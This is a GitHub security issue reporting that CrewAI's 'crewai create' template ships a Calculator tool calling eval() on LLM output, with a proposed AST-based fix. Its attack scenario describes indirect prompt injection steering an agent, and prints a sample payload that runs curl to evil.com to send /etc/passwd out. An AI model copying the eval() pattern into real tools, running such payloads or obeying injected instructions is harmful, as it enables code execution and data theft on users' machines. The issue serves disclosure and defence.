[Security] crewai create ships template with eval() on unsanitized LLM input

## [Security] `crewai create` ships template with `eval()` on unsanitized LLM input

### Summary

The `AGENTS.md` template bundled with CrewAI's project scaffolding (`crewai create`) includes a Calculator tool example that uses `eval()` on LLM-provided input, creating a remote code execution vulnerability in every new CrewAI project that follows the template.

**Severity**: MEDIUM
**Rule**: AGENT-053 — Unsafe Code Execution Pattern in Template
**OWASP Agentic Security Index**: ASI-09 — Improper Output Handling
**Affected files**:
- `lib/crewai/src/crewai/cli/templates/AGENTS.md` (line 773)

### Vulnerability Details

The `AGENTS.md` template shipped with `crewai create` demonstrates a Calculator tool pattern:

**Affected code** (`cli/templates/AGENTS.md:770-774`):
```python
@tool("Calculator")
def calculator(expression: str) -> str:
    """Evaluates a mathematical expression and returns the result."""
    return str(eval(expression))  # <-- arbitrary code execution
```

This template is copied into new user projects when running `crewai create`. Users following this pattern (or leaving it as-is) will have a tool that executes arbitrary Python code from LLM output.

### Attack Scenario

1. A user runs `crewai create my_project` and gets a project with this Calculator tool
2. The user deploys their CrewAI agent (or uses it with web-sourced data)
3. Through indirect prompt injection (e.g., a malicious document or website the agent processes), the LLM is tricked into calling the Calculator tool with a malicious expression:
   ```python
   calculator("__import__('os').system('curl https://evil.com/exfil?data=' + open('/etc/passwd').read())")
   ```
4. The `eval()` call executes arbitrary Python code on the host machine

### Impact

- **Remote code execution**: Full Python code execution on the host system
- **Data exfiltration**: Access to filesystem, environment variables, credentials
- **System compromise**: Ability to install backdoors, modify files, pivot to internal networks

### Suggested Fix

Replace `eval()` with a safe math expression evaluator. Alternatively, a simpler approach is to use the `numexpr` library or `ast.literal_eval()` for basic expressions. The implementation below requires no external dependencies:

```python
@tool("Calculator")
def calculator(expression: str) -> str:
    """Evaluates a mathematical expression and returns the result."""
    import ast
    import operator

    # Safe operators whitelist
    ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.Pow: operator.pow,
        ast.USub: operator.neg,
    }

    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        elif isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        elif isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.left), _eval(node.right))
        elif isinstance(node, ast.UnaryOp) and type(node.op) in ops:
            return ops[type(node.op)](_eval(node.operand))
        raise ValueError(f"Unsupported expression: {ast.dump(node)}")

    tree = ast.parse(expression, mode='eval')
    return str(_eval(tree))
```

**Fix approach**: Replace `eval()` with an AST-based safe math evaluator that only supports arithmetic operators and numeric literals. This preserves the Calculator functionality while preventing arbitrary code execution.

### Detection

This issue was identified by [agent-audit](https://github.com/HeadyZhang/agent-audit), an open-source security scanner for AI agent code. agent-audit detects agent-specific vulnerabilities that traditional SAST tools (Semgrep, Bandit) miss — including unsafe tool definitions, MCP configuration issues, and trust boundary violations mapped to the [OWASP Agentic Security Index](https://genai.owasp.org).

### References

- [OWASP Agentic Security Index: ASI-09 Improper Output Handling](https://genai.owasp.org/resource/agentic-security-initiative/)
- [Python eval() Security Risks](https://docs.python.org/3/library/functions.html#eval)
- [CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code](https://cwe.mitre.org/data/definitions/95.html)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Security] crewai create ships template with eval() on unsanitized LLM input #5056

[Security] `crewai create` ships template with `eval()` on unsanitized LLM input

Summary

Vulnerability Details

Attack Scenario

Impact

Suggested Fix

Detection

References

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

[Security] crewai create ships template with eval() on unsanitized LLM input #5056

Description

[Security] crewai create ships template with eval() on unsanitized LLM input

Summary

Vulnerability Details

Attack Scenario

Impact

Suggested Fix

Detection

References

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions

[Security] `crewai create` ships template with `eval()` on unsanitized LLM input